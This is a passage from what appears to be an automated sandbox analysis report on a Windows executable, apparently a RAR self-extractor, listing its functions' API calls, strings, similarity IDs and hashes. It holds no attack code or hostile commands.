    • Opcode Fuzzy Hash: 8c35613135b6be00088328436bdfbd7e7e4ad7315ecec7d7fb86e364f6f1435d
    • Instruction Fuzzy Hash: 552193B2940248EEEB20DFA4CD86FEF3BE8BF04700F140532FA159A192E771D6458B55
    APIs
    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0004C04A,00000008,?,00000000,?,0004E685,?,00000000), ref: 0005219E
    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0004C04A,00000008,?,00000000,?,0004E685,?,00000000), ref: 000521A8
    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0004C04A,00000008,?,00000000,?,0004E685,?,00000000), ref: 000521B8
    Strings
    • Thread pool initialization failed., xrefs: 000521D0
    Similarity
    • API ID: Create$CriticalEventInitializeSectionSemaphore
    • String ID: Thread pool initialization failed.
    • API String ID: 3340455307-2182114853
    • Opcode ID: 43d17ef71e58f26577c0f710d0aa5af9a73d28500986c22e180bcd3b44427165
    • Instruction ID: 55545158077b4ecd9540cf7a140b3d7b10f6c57ea950eaf5dfb5a9ac34a8db73
    • Opcode Fuzzy Hash: 43d17ef71e58f26577c0f710d0aa5af9a73d28500986c22e180bcd3b44427165
    • Instruction Fuzzy Hash: 9B11C1B1A04B08AFD3215F7A9C849A7FBDCFF65345F14482EFACAC2200D77459808B68
    APIs
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • EndDialog.USER32(?,00000001), ref: 0005C49E
    • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 0005C4B6
    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0005C4E4
    Strings
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: GETPASSWORD1
    • API String ID: 364370097-3292211884
    • Opcode ID: 61f43a10888b4a71ecacc955ffb8dac9026e77c12fc5bb0ec59aad2c6bd0ae51
    • Instruction ID: 7fb19e6eb4def7f67488340681d01780e0668c5dbc5c92b242ec571ef0ec5334
    • Opcode Fuzzy Hash: 61f43a10888b4a71ecacc955ffb8dac9026e77c12fc5bb0ec59aad2c6bd0ae51
    • Instruction Fuzzy Hash: 5511C472A402287EFB305A649D59FFB3B6CEB0A756F004020FF05F6080C2799D0A9AA5
    Strings
    Similarity
    • API ID:
    • String ID: RENAMEDLG$REPLACEFILEDLG
    • API String ID: 0-56093855
    • Opcode ID: 91af0d0e437886bb24eef62e6bc70c64b2848b6762c562533999052b54c5e954
    • Instruction ID: e6f2eb220fac1032052989fa3fb4f33b05c8fa7d1dccba7a09d0fd8d03c0f53f
    • Opcode Fuzzy Hash: 91af0d0e437886bb24eef62e6bc70c64b2848b6762c562533999052b54c5e954
    • Instruction Fuzzy Hash: 5E01D871614788AFFB154F24FC49A5B3BA4FB47756B000026FD8683170D3798D54DBA1
    APIs
      • Part of subcall function 0004F608: _swprintf.LIBCMT ref: 0004F62E
      • Part of subcall function 0004F608: _strlen.LIBCMT ref: 0004F64F
      • Part of subcall function 0004F608: SetDlgItemTextW.USER32(?,00080274,?), ref: 0004F6AF
      • Part of subcall function 0004F608: GetWindowRect.USER32(?,?), ref: 0004F6E9
      • Part of subcall function 0004F608: GetClientRect.USER32(?,?), ref: 0004F6F5
    • GetParent.USER32(?), ref: 0004132A
    • GetDlgItem.USER32(00000000,00003021), ref: 0004133A
    • SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    Strings
    Similarity
    • API ID: ItemRectTextWindow$ClientParent_strlen_swprintf
    • String ID: 0
    • API String ID: 1283792255-4108050209
    APIs
    • std::_Xinvalid_argument.LIBCPMT ref: 0004495C
      • Part of subcall function 0005FD0D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0005FD19
      • Part of subcall function 0005FD0D: ___delayLoadHelper2@8.DELAYIMP ref: 0005FD3F
    • std::_Xinvalid_argument.LIBCPMT ref: 00044967
    Strings
    Similarity
    • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
    • String ID: string too long$vector too long
    • API String ID: 2355824318-1617939282
    APIs
    • LoadCursorW.USER32(00000000,00007F00), ref: 0005AC4B
    • RegisterClassExW.USER32(00000030), ref: 0005AC6C
    Strings
    Similarity
    • API ID: ClassCursorLoadRegister
    • String ID: 0$RarHtmlClassName
    • API String ID: 1693014935-3342523147
    APIs
    Similarity
    • API ID: __alldvrm$_strrchr
    • String ID:
    • API String ID: 1036877536-0
    APIs
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00048D5C,?,?,?), ref: 0004B7F3
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00048D5C,?,?), ref: 0004B837
    • SetFileTime.KERNEL32(?,00048AEC,?,00000000,?,00000800,?,00048D5C,?,?,?,?,?,?,?,?), ref: 0004B8B8
    • CloseHandle.KERNEL32(?,?,00000800,?,00048D5C,?,?,?,?,?,?,?,?,?,?), ref: 0004B8BF
    Similarity
    • API ID: File$Create$CloseHandleTime
    • String ID:
    • API String ID: 2287278272-0
    APIs
    Similarity
    • API ID: _wcslen
    • String ID:
    • API String ID: 176396367-0
    APIs
    • _wcslen.LIBCMT ref: 00048532
    • _wcslen.LIBCMT ref: 00048558
    • _wcslen.LIBCMT ref: 000485EF
    • _wcslen.LIBCMT ref: 00048657
      • Part of subcall function 0004B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0004B991
      • Part of subcall function 0004B41F: RemoveDirectoryW.KERNEL32(?,?,?,00048649,?), ref: 0004B430
      • Part of subcall function 0004B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00048649,?), ref: 0004B45E
    Similarity
    • API ID: _wcslen$DirectoryRemove$CloseFind
    • String ID:
    • API String ID: 973666142-0
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0006A861,?,00000000,?,00000001,?,?,00000001,0006A861,?), ref: 0006DB85
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006DC0E
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,000680A1,?), ref: 0006DC20
    • __freea.LIBCMT ref: 0006DC29
      • Part of subcall function 0006A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006DBDC,00000000,?,000680A1,?,00000008,?,0006A861,?,?,?), ref: 0006A820
    Similarity
    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
    • String ID:
    • API String ID: 2652629310-0
    APIs
    • GetDC.USER32(00000000), ref: 0005B666
    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0005B675
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0005B683
    • ReleaseDC.USER32(00000000,00000000), ref: 0005B691
    Similarity
    • API ID: CapsDevice$Release
    • String ID:
    • API String ID: 1035833867-0
    APIs
    • _free.LIBCMT ref: 0006C4D4
      • Part of subcall function 000651D6: IsProcessorFeaturePresent.KERNEL32(00000017,000651A8,00000050,00074ADC,?,0004EA30,00000004,00083070,?,?,000651B5,00000000,00000000,00000000,00000000,00000000), ref: 000651D8
      • Part of subcall function 000651D6: GetCurrentProcess.KERNEL32(C0000417,00074ADC,00000050,00083070), ref: 000651FA
      • Part of subcall function 000651D6: TerminateProcess.KERNEL32(00000000), ref: 00065201
    Strings
    Similarity
    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
    • String ID: *?$.
    • API String ID: 2667617558-3972193922
    APIs
    • __EH_prolog.LIBCMT ref: 000480C3
      • Part of subcall function 00051900: _wcslen.LIBCMT ref: 00051906
      • Part of subcall function 0004B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0004B991
    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00048262
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B8FA
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B92B
    Strings
    Similarity
    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
    • String ID: :
    • API String ID: 3226429890-336475711
    APIs
    Strings
    Similarity
    • API ID: _wcslen
    • String ID: }
    • API String ID: 176396367-4239843852
    APIs
      • Part of subcall function 00050620: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0005063F
      • Part of subcall function 00050620: GetProcAddress.KERNEL32(0008A1F0,CryptUnprotectMemory), ref: 0005064F
    • GetCurrentProcessId.KERNEL32(?,00000200,?,00050690), ref: 00050723
    Strings
    • CryptUnprotectMemory failed, xrefs: 0005071B
    • CryptProtectMemory failed, xrefs: 000506DA
    Similarity
    • API ID: AddressProc$CurrentProcess
    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
    • API String ID: 2190909847-396321323
    APIs
    • _swprintf.LIBCMT ref: 0004CDE7
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    Strings
    Similarity
    • API ID: __vswprintf_c_l_swprintf
    • String ID: %c:\
    • API String ID: 1543624204-3142399695
    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00060DAD
    • ___raise_securityfailure.LIBCMT ref: 00060E95
    Strings
    Similarity
    • API ID: FeaturePresentProcessor___raise_securityfailure
    • String ID: x=
    • API String ID: 3761405300-798900570
    APIs
    • CreateThread.KERNEL32(00000000,00010000,00052470,?,00000000,00000000), ref: 0005235B
    • SetThreadPriority.KERNEL32(?,00000000), ref: 000523A2
      • Part of subcall function 000476E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00047707
    Strings
    Similarity
    • API ID: Thread$CreatePriority__vswprintf_c_l
    • String ID: CreateThread failed
    • API String ID: 2655393344-3849766595
    APIs
      • Part of subcall function 0006D0E0: GetEnvironmentStringsW.KERNEL32 ref: 0006D0E9
      • Part of subcall function 0006D0E0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006D10C
      • Part of subcall function 0006D0E0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006D132
      • Part of subcall function 0006D0E0: _free.LIBCMT ref: 0006D145
      • Part of subcall function 0006D0E0: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006D154
    • _free.LIBCMT ref: 00069660
    • _free.LIBCMT ref: 00069667
    Strings
    Similarity
    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
    • String ID: hB
    • API String ID: 400815659-2602534675
    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,00052516,?), ref: 00052302
    • GetLastError.KERNEL32(?), ref: 0005230E
      • Part of subcall function 000476E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00047707
    Strings
    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00052317
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
    • String ID: WaitForMultipleObjects error %d, GetLastError %d
    • API String ID: 1091760877-2248577382
    • Opcode ID: 67325199100991d75e78ae7eddcdd947538a81151eff37f86dd5caa2e81b7888
    • Instruction ID: fd3074b6553b110e0dcb20cffcf1d4f066cfc04db6881030fbf57b20f3d32bb0
    • Opcode Fuzzy Hash: 67325199100991d75e78ae7eddcdd947538a81151eff37f86dd5caa2e81b7888
    • Instruction Fuzzy Hash: 61D02B7190853033D60033286C09DEF38156F22730F210714F73D691F1CBBC0A8182E9
    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,0004ED75,?), ref: 0004F5C3
    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0004ED75,?), ref: 0004F5D1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FindHandleModuleResource
    • String ID: RTL
    • API String ID: 3537982541-834975271
    • Opcode ID: c42be2ee0f956b024f7faa51d569bfe833ae1b5a475372e352065aacc15907fe
    • Instruction ID: 82d14217fb3c844b35353cb21214d7480c6beab1cf1754b944f2d7e1c21a539b
    • Opcode Fuzzy Hash: c42be2ee0f956b024f7faa51d569bfe833ae1b5a475372e352065aacc15907fe
    • Instruction Fuzzy Hash: 20C01271A4475066E63027716C0DB832E9C5B00715F054458B709EA1C0DBFDC88086A4